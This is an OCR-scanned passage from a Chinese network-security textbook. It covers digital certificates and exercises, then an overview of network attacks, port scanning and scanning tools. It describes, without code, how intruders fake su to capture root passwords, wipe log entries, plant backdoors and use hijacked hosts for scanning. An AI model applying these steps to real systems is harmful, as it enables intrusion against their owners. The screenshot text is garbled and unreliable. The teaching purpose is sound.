(5) 上 传 要 签名 的 Word 文档 ， 如 图 2-21 所 示 。 

(6) 设计 签名 ， 如 图 2-22 所 示 。 

(7) 发 送 该 文档 给 其 他 邮件 ， 收 件 人 可 以 验证 该 签名 ， 如 图 2-23 所 示 。 
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2-20 ”激活 账户 


Sign a Document 





GET FROM CLOUD ~ 





2-21 上 传 签名 文档 








Adopt Your Signature 


Confim your name. initials, and signature 


Full Name Initials 
hanyuhang HYH 
Seiec Sye Draw 
previEw 
DocuSigned by: Ds 
(aa | UE oa 
本 


By licking Adapt and Sgn, | egres thatthis markwil be the siectrcnic repressntaton oF my signeture oriniias whenever | Use + 1also understand that 
recipients of dectronic documents | ign will be eble to see my DocuSign D, whicn willinclude my eallacdresa 





图 2-22 设计 签名 
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韩 宇航 hanyuhang 韩 宇航 hanyuhang 韩 宇航 hanyuhang 韩 宇航 hanyuhang 韩 宇航 hanyuhang 


韩 宇航 hanyuhang 韩 宇航 hanyuhang 韩 字 航 hanyuhang 韩 字 航 hanyuhang 韩 宇航 hanyuhang 
韩 宇航 hanyuhang 韩 宇航 hanyuhang 韩 字 航 hanyuhang 韩 宇航 hanyuhang 韩 字 航 hanyuhang 
韩 宇航 hanyuhang 韩 宇航 hanyuhang 韩 字 航 hanyuhang 韩 字 航 hanyuhang 韩 宇航 hanyuhang 





图 2-23 验证 签名 
2. 数字 证 书 的 应 用 


数字 证 书 主要 应 用 于 各 种 需要 身份 认证 的 场合 ， 目 前 除 广泛 应 用 于 网 上 银行 、 网 上 交 
易 等 商务 应 用 外 ， 数 字 证 书 还 可 以 应 用 于 发 送 安全 电子 邮件 、 加 密 文 件 等 方面 。 以 下 是 几 
个 数字 证 书 常用 的 应 用 实例 ， 从 中 可 以 了 解数 字 证 书 技术 及 其 应 用 。 

1) 保证 网 上 银行 的 安全 

只 要 你 申请 并 使 用 了 银行 提供 的 数字 证 书 ， 即 可 保证 网 上 银行 业务 的 安全 ， 即 使 黑客 
窃取 了 你 的 账户 密码 ， 因 为 他 没有 你 的 数字 证 书 ， 所 以 也 无 法 进入 你 的 网 上 银行 账户 。 

移动 数字 证 书 ， 工 行 叫 U 盾 ， 农 行 叫 K 宝 ， 建 行 叫 网 银 盾 ， 光 大 银行 叫 阳光 网 盾 ， 
在 支付 宝 中 的 叫 支付 盾 。 

它 存 放 着 你 个 人 的 数字 证 书 ， 并 不 可 读 取 。 同 样 ， 银 行 也 记录 着 你 的 数字 证 书 。 

当 你 尝试 进行 网 上 交易 时 ， 银 行 会 向 你 发 送 由 时 间 字 串 ， 地 址 字 串 ， 交 易 信息 字 串 ， 
防 重 放 攻 击 字 串 组 合 在 一 起 进行 加 密 后 得 到 的 字符 串 A， 你 的 U 盾 将 根据 你 的 个 人 证 书 对 
字符 串 A 进行 不 可 逆 运 算得 到 字符 串 B， 并 将 字符 串 B 发 送 给 银行 ， 银 行 端 也 同时 进行 该 
不 可 逆 运 算 ， 如 果 银 行 运算 结果 和 你 的 运算 结果 一 致 便 认 为 你 合法 ， 交 易 便 可 以 完成 ， 如 
果 不 一 致 便 认 为 你 不 合法 ， 交 易 便 会 失败 。 

2) 发 送 安全 邮件 

由 于 越 来 越 多 的 人 通过 电子 邮件 进行 重要 的 商务 活动 和 发 送 机 密 信息 ， 而 且 随 着 互联 
网 的 飞速 发 展 ， 这 类 应 用 会 更 加 频繁 。 因 此 保证 邮件 的 真实 性 ( 即 不 被 他 人 伪造 ) 与 不 被 其 
他 人 截取 和 偷 阅 也 变 得 日 趋 重 要 。 许 多 黑客 软件 能 够 很 容易 地 发 送 假 地 址 邮件 和 匿名 邮 
件 ， 另 外 即使 是 正确 地 址 发 来 的 邮件 在 传递 途中 也 很 容易 被 别人 截取 并 阅读 ， 这 些 对 于 重 
要 信件 来 说 是 难以 容忍 的 。 

3) 通过 数字 证 书 防止 网 站 被 假冒 。 

网 站 服务 器 证 书 被 安装 于 服务 器 设备 上 ， 用 来 证 明 服 务 器 的 身份 和 进行 通信 加 密 。 网 
站 服务 器 证 书 可 以 用 来 防止 欺诈 钓鱼 站 点 。 

在 服务 器 上 安装 服务 器 证 书后 ， 客 户 端 浏览 器 可 以 与 服务 器 证 书 建立 SSL 连接 ， 在 
SSL 连接 上 传输 的 任何 数据 都 会 被 加 密 。 同 时 ， 浏 览 器 会 自动 验证 服务 器 证 书 是 否 有 效 ， 
验证 所 访问 的 站 点 是 否 是 假冒 站 点 ， 服 务 器 证 书 保护 的 站 点 多 被 用 来 进行 密码 登录 、 订 单 
处 理 、 网 上 银行 交易 等 。 
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本 章 小 结 


本 章 在 对 密码 学 的 相关 知识 进行 概述 性 介绍 的 基础 上 ， 重 点 讲述 了 目前 最 为 常见 的 两 
种 数据 加 密 技术 一 一 对 称 加 密 和 公开 密 钥 算 法 ， 分 别 分 析 了 这 两 种 典型 算法 的 基本 思想 和 
在 实际 中 的 应 用 ， 重 点 讲述 了 数字 签名 和 数字 证 书 的 应 用 。 


习 题 


一 、 选 择 题 


Hk 


2 


常用 的 公开 密 钥 ( 非 对 称 密 钥 ) 加 密 算法 有 ( ” )。 
A. DES B. SED C. RSA D. RAS 
最 有 效 的 保护 E-mail 的 方法 是 使 用 加 密 签字 ， 如 ( 。”) 来 验证 E-mail 信息 。 通 过 


验证 E-mail 信息 ， 可 以 保证 信息 确实 来 自发 信人 ， 并 保证 在 传输 过 程 没 有 被 修改 。 


(44. 


A. Diffie-Hellman B. Pretty Good Privacy(PGP) 
C. Key Distribution Center(KDC) D. IDEA 

RSA 加 密 算法 不 具有 的 优点 是 (  )。 

A. 可 借助 CA 中 心 发 放 密 钥 ， 确 保密 钥 发 放 的 安全 方便 

B. 可 进行 用 户 认证 

C. 可 进行 信息 认证 

D. 运行 速度 快 ， 可 用 于 大 批量 数据 加 密 

PGP 加 密 软件 采用 的 加 密 算 法 是 (  )。 


A. DES B. RSA C. 背包 算法 D. IDEA 
DES 是 (  )。 
A. 非 对 称 加 密 方式 B. 公开 密 钥 加 密 系统 
C. 对 称 加 密 方式 
6. RSA 加 密 算法 的 安全 性 由 ( ) 决 定 。 
A. 公 钥 的 安全 性 B. 私 钥 的 安全 性 
C. 从 nn 分 解 9、p 的 难度 D. 计算 机 的 速度 


天 


8. 


以 下 关于 对 称 密 钥 加 密 说 法 ， 正 确 的 是 ( 下 

A. 加 密 方 和 解密 方 可 以 使 用 不 同 的 算法 

B. 加 密 密 钥 和 解密 密 钥 可 以 是 不 同 的 

C. 加 密 密 钥 和 解密 密 钥 必须 是 相同 的 

D. 密 钥 的 管理 非常 简单 

以 下 关于 CA 认证 中 心 说 法 ， 正 确 的 是 ( 。 )。 

A. CA 认证 是 使 用 对 称 密 钥 机 制 的 认证 方法 

B. CA 认证 中 心 只 负责 签名 ， 不 负责 证 书 的 产生 

C. CA 认证 中 心 负责 证 书 的 颁发 和 管理 ， 并 依靠 证 书证 明 一 个 用 户 的 身份 


10. 
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D. CA 认证 中 心 不 用 保持 中 立 ， 可 以 随便 找 一 个 用 户 来 作为 CA 认证 中 心 

关于 CA 和 数字 证 书 的 关系 ， 以 下 说 法 不 正确 的 是 ( 。 )。 

A. 数字 证 书 是 保证 双方 之 间 的 通信 安全 的 电子 信任 关系 ， 由 CA 签发 

B. 数字 证 书 一 般 依靠 CA 中 心 的 对 称 密 钥 机 制 来 实现 

C. 在 电子 交易 中 ， 数 字 证 书 可 以 用 于 表明 参与 方 的 身份 

D. 数字 证 书 能 以 一 种 不 能 被 假冒 的 方式 证 明证 书 持 有 人 身份 

所 谓 加 密 ， 是 指 将 一 个 信息 经 过 ( ) 及 加 密 函 数 转换 ， 变 成 无 意义 的 密 文 ， 而 


接受 方 则 将 此 密 文 经 过 解密 函数 、( 。”) 还 原 成 明文 。 
A. 加 密 钥 匙 、 解 密 钥匙 B. 解密 钥匙 、 解 密 钥 是 
C. 加 密 钥 匙 、 加 密 钥 是 D. 解密 钥匙 、 加 密 钥匙 


.以 下 关于 非 对 称 密 钥 加 密 说 法 正确 的 是 (  )。 


A. 加 密 方 和 解密 方 使 用 的 是 不 同 的 算法 

B. 加 密 密 钥 和 解密 密 钥 是 不 同 的 

C. 加 密 密 钥 和 解密 密 钥 是 相同 的 

D. 加 密 密 钥 和 解密 密 钥 没 有 任何 关系 

操作 题 

使 用 软件 PGP 创建 密 钥 、 与 他 人 交换 密 钥 ， 并 使 用 密 钥 进行 邮件 加 密 。 
使 用 MD5 文件 加 密 工 具 计 算 某 个 文件 的 MD5 值 。 
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【项 目 要 点 】 


端口 扫描 。 

口令 攻击 。 

网 络 监听 。 

ARP 欺骗 。 

缓冲 区 溢出 。 

拒绝 服务 攻击 。 

【学 习 目 标 】 

掌握 端口 扫描 工具 的 使 用 方法 。 
掌握 口令 破解 的 原理 与 方法 。 
掌握 网 络 监听 的 原理 与 工具 使 用 方法 。 
掌握 ARP 欺骗 的 原理 。 

掌握 缓冲 区 溢出 的 原理 。 

掌握 拒绝 式 服务 攻击 的 原理 。 


3.1 网 络 攻击 概述 
3.1.1 网 络 攻击 的 分 类 


当前 网 络 攻击 的 方法 非常 灵活 。 从 攻击 的 目的 来 看 ， 可 以 有 拒绝 服务 攻击 (DoS)、 获 
取 系 统 权 限 的 攻击 、 获 取 敏 感 信息 的 攻击 ;从 攻击 的 切入 点 来 看 ， 有 缓冲 区 溢出 攻击 、 系 
统 设置 漏洞 的 攻击 等 ， 从 攻击 的 纵向 实施 过 程 来 看 ， 有 获取 初级 权限 攻击 、 提 升 最 高 权限 
的 攻击 、 后 站 攻击、 跳板 攻击 等 ， 从 攻击 的 类 型 来 看 ， 包 括 对 各 种 操作 系统 的 攻击 、 对 网 
络 设备 的 攻击 、 对 特定 应 用 系统 的 攻击 等 。 所 以 说 ， 很 难以 一 个 统一 的 模式 对 各 种 攻击 手 
段 进行 分 类 。 

常见 的 攻击 方式 有 四 类 : 拒绝 服务 攻击 、 利 用 型 攻击 、 信 息 收 集 型 攻击 、 假 消息 攻 
击 。 分 别 介绍 如 下 。 

(1) 拒绝 服务 攻击 ， 企 图 通过 使 服务 器 崩溃 或 把 它 压 垮 来 阻止 其 提供 服务 。 拒 绝 服务 
攻击 是 最 容易 实施 的 攻击 行为 ， 主 要 包括 死亡 之 ping、 泪 滴 、UDP 洪水 、SYN 洪水 、 
Land 攻击 、Smurf 攻击 、Fraggle 攻击 、 电 子 邮 件 炸 弹 、 畸 形 消息 攻击 等 。 

(2) 利用 型 攻击 ， 这 是 一 类 试图 直接 对 机 器 进行 控制 的 攻击 ， 最 常见 的 有 口令 猜测 、 
特洛伊 木马 、 缓 冲 区 溢出 。 

(3) 信息 收集 型 攻击 ， 它 并 不 对 目标 本 身 造 成 危害 ， 而 是 被 用 来 为 进一步 入 侵 提供 有 
用 的 信息 ， 主 要 包括 扫描 技术 、 体 系 结构 刺探 、 利 用 信息 服务 。 

(4) 假 消 息 攻 击 ， 用 于 攻击 目标 配置 不 正确 的 消息 ， 主 要 包括 DNS 高 速 缓存 污染 、 
伪造 电子 邮件 。 
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3.1.2 网络 攻击 的 步骤 


1. 攻击 的 准备 阶段 


入 侵 者 的 来 源 有 两 种 ， 一 种 是 内 部 人 员 利 用 自己 的 工作 机 会 和 权限 来 获取 不 应 该 获取 
的 权限 而 进行 的 攻击 。 另 一 种 是 外 部 人 员 入 侵 ， 包 括 远程 入 侵 、 网 络 节点 接 入 入 侵 等 。 网 
络 攻击 主要 是 远程 攻击 。 

进行 网 络 攻 击 是 一 件 系统 性 很 强 的 工作 ， 其 主要 工作 流程 是 : 收集 情报 、 远 程 攻击 、 
远程 登录 、 取 得 普通 用 户 的 权限 、 取 得 超级 用 户 的 权限 、 留 下 后 门 、 清 除 日 志 。 主 要 内 容 
包括 目标 分 析 、 文 档 获取 、 破 解密 码 、 日 志清 除 等 技术 ， 下 面 分 别 介绍 。 

1) 确定 攻击 的 目的 

攻击 者 在 进行 一 次 完整 的 攻击 之 前 ， 首 先 要 确定 攻击 要 达到 什么 样 的 目的 ， 即 给 对 方 
造成 什么 样 的 后 果 。 常 见 的 攻击 目的 有 破坏 型 和 入 侵 型 两 种 。 破 坏 型 攻击 指 的 是 只 破坏 攻 
击 目标 ， 使 其 不 能 正常 工作 ， 而 不 能 随意 控制 目标 的 系统 的 运行 。 要 达到 破坏 型 攻击 的 目 
的 ， 主 要 的 手段 是 拒绝 服务 攻击 (Denial of Service)。 另 一 类 常见 的 攻击 目的 是 入 侵 攻击 目 
标 ， 这 种 攻击 是 要 获得 一 定 的 权限 来 达到 控制 攻击 目标 的 目的 。 应 该 说 这 种 攻击 比 破坏 型 
攻击 更 为 普遍 ， 威 胁 性 也 更 大 。 因 为 黑客 一 旦 获取 攻击 目标 的 管理 员 权 限 ， 就 可 以 对 此 服 
务 器 做 任意 动作 ， 包 括 破坏 性 的 攻击 。 此 类 攻击 一 般 是 利用 服务 器 操作 系统 、 应 用 软件 或 
者 网 络 协议 存在 的 漏洞 进行 的 。 还 有 另 一 种 造成 此 种 攻击 的 原因 是 密码 泄露 ， 攻 击 者 靠 猜 
测 或 者 穷 举 法 得 到 服务 器 用 户 的 密码 ， 然 后 就 可 以 和 真正 的 管理 员 一 样 对 服务 器 进行 访问 。 

2) 信息 收集 

除了 确定 攻击 目的 之 外 ， 攻 击 前 的 最 主要 工作 就 是 收集 尽量 多 的 关于 攻击 目标 的 信 
息 。 这 些 信息 主要 包括 目标 的 操作 系统 类 型 及 版 本 ， 目 标 提供 哪些 服务 ， 各 服务 器 程序 的 
类 型 与 版 本 ， 以 及 相关 的 社会 信息 。 

要 攻击 一 台 机 器 ， 首 先 要 确定 它 上 面 正 在 运行 的 操作 系统 是 什么 ， 因 为 不 同类 型 的 操 
作 系统 ， 其 上 的 系统 漏洞 有 很 大 区 别 ， 所 以 攻击 的 方法 也 完全 不 同 ， 甚 至 同一 种 操作 系统 
的 不 同 版 本 的 系统 漏洞 也 是 不 一 样 的。 确定 一 台 服 务 器 的 操作 系统 一 般 是 靠 经 验 ， 有 些 服 
务 器 的 某 些 服务 显示 信息 会 泄露 其 操作 系统 。 例 如 当 通 过 Telnet 协议 连 上 一 台 机 器 时 ， 如 
果 显 示 : 

Unix(r) System V Release 4.0 

login: 

根据 经 验 就 可 以 确定 这 个 机 器 上 运行 的 操作 系统 为 SUN OS 5.5 或 5.5.1。 但 这 样 确定 
操作 系统 类 型 有 时 是 不 准确 的 ， 因 为 有 些 网 站 管理 员 为 了 迷惑 攻击 者 会 故意 更 改 显 示 信 
息 ， 造 成 假象 。 

还 有 一 些 不 是 很 有 效 的 方法 ， 诸 如 查询 DNS 的 主机 信息 (不 是 很 可 靠 ) 来 看 登记 域名 时 
的 申请 机 器 类 型 和 操作 系统 类 型 ， 或 者 使 用 社会 工程 学 的 方法 来 获得 ， 以 及 利用 某 些 主机 
开放 的 SNMP 的 公共 组 来 查询 。 

另外 一 种 相对 比较 准确 的 方法 是 利用 网 络 操作 系统 里 的 TCP/IP 堆栈 作为 特殊 的 “ 指 
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纹 ” 来 确定 系统 的 真正 身份 。 因 为 不 同 的 操作 系统 在 网 络 底层 协议 的 各 种 实现 细节 上 略 有 
不 同 ， 可 以 远程 向 目标 发 送 特殊 的 包 ， 然 后 通过 返回 的 包 来 确定 操作 系统 类 型 。 例 如 通过 
向 目标 机 发 送 一 个 FIN 的 包 (或 者 是 任何 没有 ACK 或 SYN 标记 的 包 ) 到 目标 主机 的 一 个 开 
放 的 端口 然后 等 待 回 应 。 许 多 系统 会 返回 一 个 RESET。 发 送 一 个 SYN( 包 含有 没有 定义 的 
TCP 标记 的 TCP 头 )， 那 么 Linux 系统 的 回应 包 就 会 包含 这 个 没有 定义 的 标记 ， 而 在 一 些 
别 的 系统 则 会 在 收 到 SYN+BOGU 包 之 后 关闭 连接 。 利 用 寻找 初始 化 序列 长 度 模 板 与 特定 
的 操作 系统 相 匹 配 的 方法 ， 可 以 对 许多 系统 分 类 ， 如 较 早 的 Unix 系统 是 64KB 的 长 度 ， 一 
些 新 的 Unix 系统 的 长 度 则 是 随机 增长 。 还 可 以 检查 返回 包 里 包含 的 窗口 长 度 ， 根 据 各 个 
操作 系统 的 不 同 的 初始 化 窗口 大 小 来 唯一 确定 它们 。 

获知 目标 提供 哪些 服务 及 各 服务 守护 程序 (daemon) 的 类 型 、 版 本 同样 非常 重要 ， 因 为 
己 知 的 漏洞 一 般 都 是 对 某 一 服务 的 。 这 里 说 的 提供 服务 就 是 指 通常 我 们 提 到 的 端口 ， 如 一 
般 Telnet 在 23 端口 FTP 在 21 端口 ，WWW 在 80 端口 或 8080 端口 ， 当 然 ， 网 站 管理 员 
完全 可 以 按 自己 的 意愿 修改 服务 所 监听 的 端口 号 。 在 不 同 服务 器 上 提供 同一 种 服务 的 软件 
也 可 以 不 同 ， 这 种 软件 叫 作 守护 程序 ， 如 同样 提供 FTP 服务 ， 可 以 使 用 wuftp、proftp、 
ncftp 等 许多 不 同 种 类 的 守护 程序 。 确 定 守护 程序 的 类 型 版 本 也 有 助 于 黑客 利用 系统 漏 
洞 攻破 网 站 。 

另外 需要 获得 的 关于 系统 的 信息 就 是 一 些 与 计算 机 本 身 没 有 关系 的 社会 信息 ， 如 网 站 
所 属 公 司 的 名 称 、 规 模 ， 网 络 管理 员 的 生活 习惯 、 电 话 号 码 等 。 这 些 信 息 看 起 来 与 攻击 一 
个 网 站 没有 关系 ， 实 际 上 很 多 黑客 都 是 利用 了 这 类 信息 攻破 网 站 的 。 例 如 有 些 网 站 管理 员 
用 自己 的 电话 号 码 做 系统 密码 ， 如 果 掌 握 了 该 电话 号 码 ， 就 等 于 掌握 了 管理 员 权限 。 进 行 
信息 收集 可 以 用 手工 ， 也 可 以 利用 工具 来 完成 。 完 成 信息 收集 的 工具 叫 作 扫描 器 。 用 扫描 
器 收集 信息 的 优点 是 速度 快 ， 可 以 一 次 对 多 个 目标 进行 扫描 。 


2. 攻击 的 实施 阶段 


1) 获得 权限 

当 收 集 到 足够 的 信息 之 后 ， 攻 击 者 就 要 开始 实施 攻击 行动 了 。 作 为 破坏 型 攻击 ， 只 需 
利用 工具 发 动 攻击 即 可 。 而 作为 入 侵 型 攻击 ， 往 往 要 利用 收集 到 的 信息 ， 找 到 其 系统 漏 
洞 ， 然 后 利用 该 漏洞 获取 一 定 的 权限 。 有 时 获得 了 一 般 用 户 的 权限 就 足以 达到 修改 主页 等 
目的 了 。 但 作为 一 次 完整 的 攻击 是 要 获得 系统 最 高 权限 的 ， 这 不 仅 是 为 了 达到 一 定 的 目 
的 ， 更 重要 的 是 证 明 攻 击 者 的 能 力 。 

能 够 被 攻击 者 所 利用 的 漏洞 不 仅 包括 系统 软件 设计 上 的 安全 漏洞 ， 也 包括 由 于 管理 配 
置 不 当 而 造成 的 漏洞 。 前 不 入， 因特网 上 应 用 最 普及 的 著名 WWW 服务 器 提供 商 Apache 
的 主页 被 黑客 攻破 ， 其 主页 面 上 的 Powered by Apache 图 标 (羽毛 状 的 图 画 ) 被 改 成 了 
Powered by Microsoft Backoffice 图 标 ， 那 个 攻击 者 就 是 利用 了 管理 员 对 Webserver 数据 库 
的 一 些 不 当 配 置 而 成 功 取得 最 高 权限 的 。 

当然 大 多 数 攻 击 成 功 的 范例 还 是 利用 了 系统 软件 本 身 的 漏洞 。 造 成 软件 漏洞 的 主要 原 
因 在 于 编制 该 软件 的 程序 员 缺 乏 安 全 意识 ， 当 攻击 者 对 软件 进行 非 正常 的 调用 请 求 时 ， 造 
成 缓冲 区 溢出 或 者 对 文件 的 非法 访问 ， 其 中 利用 缓冲 区 溢出 进行 的 攻击 最 为 普遍 。 

无 论 作为 一 个 黑客 还 是 一 个 网 络 管理 员 ， 都 需要 掌握 尽量 多 的 系统 漏洞 。 黑 客 需 要 用 
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它 来 完成 攻击 ， 而 管理 员 需 要 根据 不 同 的 漏洞 来 进行 不 同 的 防御 措施 。 了 解 最 新 最 多 的 漏 
洞 信 息 ， 可 以 到 Rootshell(www.rootshell.com) 、 Packetstorm(packetstorm.Securify.com) 、 
Securityfocus(www.securityfocus.com) 等 网 站 去 查找 。 

2) 权限 的 扩大 

系统 漏洞 分 为 远程 漏洞 和 本 地 漏洞 两 种 。 远 程 漏洞 是 指 黑客 可 以 在 别 的 机 器 上 直接 利 
用 该 漏洞 进行 攻击 并 获取 一 定 的 权限 。 这 种 漏洞 的 威胁 性 相当 大 ， 黑 客 的 攻击 一 般 都 是 从 
远程 漏洞 开始 的 。 但 是 利用 远程 漏洞 获取 的 不 一 定 是 最 高 权限 ， 而 往往 只 是 一 个 普通 用 户 
的 权限 ， 这 样 常常 没有 办 法 做 黑客 们 想 要 做 的 事 。 这 时 就 需要 配合 本 地 漏洞 来 把 获得 的 权 
限 进行 扩大 ， 常 常 是 扩大 至 系统 的 管理 员 权 限 。 

只 有 获得 了 最 高 的 管理 员 权 限 ， 才 可 以 做 网 络 监听 、 打 扫 痕 迹 之 类 的 事情 。 完 成 权限 
的 扩大 ， 不 但 可 以 利用 已 获得 的 权限 在 系统 上 执行 利用 本 地 漏洞 的 程序 ， 还 可 以 放置 一 些 
木马 之 类 的 欺骗 程序 来 套 取 管 理 员 密码 (这 种 木马 是 放 在 本 地 套 取 最 高 权限 用 的 ， 而 不 能 进 
行 远 程控 制 )。 例 如 一 个 黑客 已 经 在 一 台 机 器 上 获得 了 一 个 普通 用 户 的 账号 和 登录 权限 ， 那 
么 他 就 可 以 在 这 台 机 器 上 放置 一 个 假 的 su 程序 。 当 真正 的 合法 用 户 登录 时 ， 运 行 了 该 su 
程序 并 输入 了 密码 ， 这 时 root 密码 就 会 被 记录 下 来 ， 下 次 黑客 再 登录 时 就 可 以 使 用 su 程 
序 而 拥有 root 权限 了 。 


3. 攻击 的 善后 工作 


如 果 攻 击 者 完成 攻击 后 就 立刻 离开 系统 而 不 做 任何 善后 工作 ， 那 么 他 的 行踪 将 很 快 被 
系统 管理 员 发 现 ， 因 为 所 有 的 网 络 操作 系统 一 般 都 提供 日 志 记录 功能 ， 会 把 系统 上 发 生 的 
动作 记录 下 来 。 所 以 ， 为 了 自身 的 隐蔽 性， 黑客 一 般 都 会 抹 掉 自己 在 日 志 中 留 下 的 痕迹 。 

1) 隐藏 踪迹 

攻击 者 在 获得 系统 最 高 管理 员 权 限 之 后 ， 就 可 以 随意 修改 系统 上 的 文件 了 ， 包 括 日 志 
文件 ， 所 以 黑客 想 要 隐藏 自己 的 踪迹 的 话 ， 就 会 对 日 志 进 行 修改 。 最 简单 的 方法 当然 就 是 
删除 日 志文 件 了 ， 但 这 样 做 虽然 避免 了 系统 管理 员 根据 IP 追踪 到 自己 ， 但 也 明确 无 误 地 告 
诉 了 管理 员 ， 系 统 已 经 被 入 侵 了 。 所 以 最 常用 的 办 法 是 只 对 日 志文 件 中 有 关 自 己 的 那 一 部 
分 做 修改 。 关 于 修改 方法 ， 不 同 的 操作 系统 有 所 区 别 ， 网 络 上 有 许多 此 类 程序 ， 如 zap、 
wipe 等 ， 其 主要 做 法 就 是 清除 utmp、wtmp、Lastlog 和 Pacct 等 日 志文 件 中 某 一 用 户 的 
信息 。 

2) 后 门 

黑客 在 攻 入 系统 后 ， 一 般 要 不 止 一 次 地 进入 该 系统 。 为 了 下 次 再 进入 系统 时 方便 一 
些 ， 黑 客 会 留 下 一 个 后 门 ， 特 洛 伊 木马 就 是 后 门 的 最 好 范例 。 


3.2 端口 扫描 
3.2.1 原理 


1. 端口 扫描 的 原理 
尝试 与 目标 主机 的 某 些 端口 建立 连接 ， 如 果 目 标 主机 的 该 端口 有 回复 ， 则 说 明 该 端口 
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开放 ， 即 为 “活动 端口 ”。 
2. 扫描 分 类 


1) 全 TCP 连接 

这 种 扫描 方法 使 用 三 次 握手 ， 与 目标 计算 机 建立 标准 的 TCP 连接 。 需 要 说 明 的 是 ， 这 
种 古老 的 扫描 方法 很 容易 被 目标 主机 记录 。 

2) 半 打 开 式 扫描 (SYN 扫描 ) 

在 这 种 扫描 技术 中 ， 扫 描 主 机 自动 向 目标 计算 机 的 指定 端口 发 送 SYN 数据 段 ， 表 示 
发 送 建 立 连接 请 求 。 

(1) 如 果 目 标 计算 机 的 回应 TCP 报 文中 SYN=1，ACK=1， 则 说 明 该 端口 是 活动 的 ， 
接着 扫描 主机 发 送 一 个 RST 给 目标 主机 以 拒绝 建立 TCP 连接 ， 从 而 导致 三 次 握手 过 程 的 
失败 。 

(2) 如 果 目 标 计算 机 的 回应 是 RST， 则 表示 该 端口 为 “ 死 端 口 ”， 这 种 情况 下 ， 扫 描 
主机 不 用 做 任何 回应 。 由 于 扫描 过 程 中 全 连接 尚未 建立 ， 所 以 大 大 降低 了 被 目标 计算 机 记 
录 的 可 能 ， 并 且 加 快 了 扫描 的 速度 。 

3) FIN 扫描 

在 TCP 报 文中 ， 有 一 个 字段 为 FIN。FIN 扫描 则 依靠 发 送 FIN 来 判断 目标 计算 机 的 指 
定 端口 是 否 活动 。 发 送 一 个 FIN=1 的 TCP 报 文 到 一 个 关闭 的 端口 时 ， 该 报 文 会 被 丢掉 ， 
并 返回 一 个 RST 报 文 。 但 是 ， 如 果 当 FIN 报 文 被 发 送 到 一 个 活动 的 端口 时 ， 该 报 文 只 是 
简单 的 丢掉 ， 不 会 返回 任何 回应 。 从 FIN 扫描 可 以 看 出 ， 它 没有 涉及 任何 TCP 连接 部 
分 ， 因 此 这 种 扫描 比 前 两 种 都 安全 ， 可 以 称 之 为 秘密 扫描 。 

4) 第 三 方 扫描 

第 三 方 扫描 又 称 “ 代 理 扫 描 ”， 这 种 扫描 是 利用 第 三 方 主机 来 代替 入 侵 者 进行 扫描 。 
这 个 第 三 方 主机 一 般 是 入 侵 者 通过 入 侵 其 他 计算 机 而 得 到 的 ， 该 “第 三 方 ”主机 常 被 入 侵 
者 称 之 为 “肉鸡 ”。 这 些 “ 肉 鸡 ”一 般 为 安全 防御 系数 极 低 的 个 人 计算 机 。 


3.2.2 工具 


端口 扫描 的 工具 很 多 ， 常 用 的 有 X-Port、PortScanner、SuperScan、 流 光 、X-Scan 等 。 

(1) X-Port: 多 线程 方式 扫描 目标 主机 开放 端口 ， 扫 描 过 程 中 根据 TCP/IP 堆栈 特征 被 
动 识 别 操作 系统 类 型 ， 若 没有 匹配 记录 ， 尝 试 通过 NetBIOS 判断 是 否 为 Windows 系列 操 
作 系 统 并 尝试 获取 系统 版 本 信息 。 

(2) PortScanner: 由 StealthWasp 编写 的 基于 图 形 界面 的 端口 扫描 软件 。 在 Target ip 
文本 框 中 输入 目标 卫 ， 在 Scan port 文本 框 中 输入 扫描 端口 范围 ， 单 击 Scan 按钮 开始 
扫描 。 

(3) SuperScan: 是 一 个 集 端 口 扫 描 、ping、 主 机 名 解析 于 一 体 的 扫描 器 ， 功 能 是 检测 
主机 是 否 在 线 ; IP 和 主机 名 之 间 相 互 转换 ， 通 过 TCP 连接 试探 目标 主机 运行 的 服务 ， 扫 
描 指 定 范围 的 主机 端口 ， 使 用 文件 列表 来 指定 扫描 主机 范围 。 
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流光 : 小 榕 编写 的 一 款 扫 描 工 具 ， 主 要 有 如 下 功能 。 
用 于 检测 POP3/FTP 主机 中 用 户 密码 安全 漏洞 。 

163/169 双 通 。 

多 线程 检测 ， 消 除 系统 中 密码 漏洞 。 

高 效 的 用 户 流 模式 。 

高 效 服务 器 流 模式 ， 可 同时 对 多 台 POP3/FTP 主机 进行 检测 。 
最 多 500 个 线程 探测 。 

线程 超时 设置 ， 阻 塞 线程 具有 自杀 功能 ， 不 会 影响 其 他 线程 。 
支持 10 个 字典 同时 检测 。 

检测 设置 可 作为 项 目 保 存 。 

X-Scan 是 国内 最 著名 的 综合 扫描 器 之 一 ， 它 完全 免费 ， 是 不 需要 安装 的 绿色 软件 ， 界 
面 支 持 中 文 和 英文 两 种 语言 ， 包 括 图 形 界面 和 命令 行 方式 。X-Scan 主要 由 国内 著名 的 民间 
黑客 组 织 “ 安 全 焦点 ”完成 ， 从 2000 年 的 内 部 测试 版 X-Scan V0.2 到 目前 的 最 新 版 本 
X-Scan 3.3-cn 都 凝聚 了 国内 众多 黑客 的 心血 。 最 值得 一 提 的 是 ，X-Scan 把 扫描 报告 和 安全 
焦点 网 站 相连 接 ， 对 扫描 到 的 每 个 漏洞 进行 风险 等 级 评估 ， 并 提供 漏洞 描述 、 漏 洞 溢出 程 
序 ， 方 便 网 管 测试 、 修 补漏 洞 。 

(5) X-Scan: 采用 多 线程 方式 对 指定 卫 地 址 段 (或 单机 ) 进 行 安全 漏洞 检测 ， 支 持 插件 
功能 。 扫 描 内 容 包 括 远程 服务 类 型 、 操 作 系统 类 型 及 版 本 ， 各 种 弱 口 令 漏 洞 、 后 门 、 应 用 
服务 漏洞 、 网 络 设备 漏洞 、 拒 绝 服务 漏洞 等 。 

X-Scan 解压 后 即 可 运行 ， 程 序 的 主 界面 如 图 3-1 所 示 。 

人 X-Scan v3.3 GUI > |DIx| 
文件 (W) 设置 (W) 查看 (0) 工具 (Y) Language 才 助 (Z) 

JejPue| 加 | 国名 | 加 

普通 信息 | 漏洞 信息 | 错误 信息 | 


@@G@@O 昌 gb@eY 

















， 所 需 文件 : 


xscan_gui. exe -- X-Scan 图 形 界 面 主 程序 

checkhost. dat 扫 二 并 区 诗 得 

plete exe 在 线 升级 在 

ol 和 将 二 二 过 沪 接 和 

信用 光明 txt 起 sean 使 用 说 明 
RE i “actcev3ggcrgn 项 5 
ee -当前 马 置 六 入 ,用 于 保存 当前 使 用 
的 所 从 六 全。 出 


fdat/*. cfg 一 用 户 自 定义 配置 文件 


NA 一 用 户 名 /密码 字典 廊 件 ， 用 于 检测 弱 
Jplugins 一 用 于 存放 所 有 插件 (后 缀 名 为 . xpn) 


fscripts er z| 











| | 
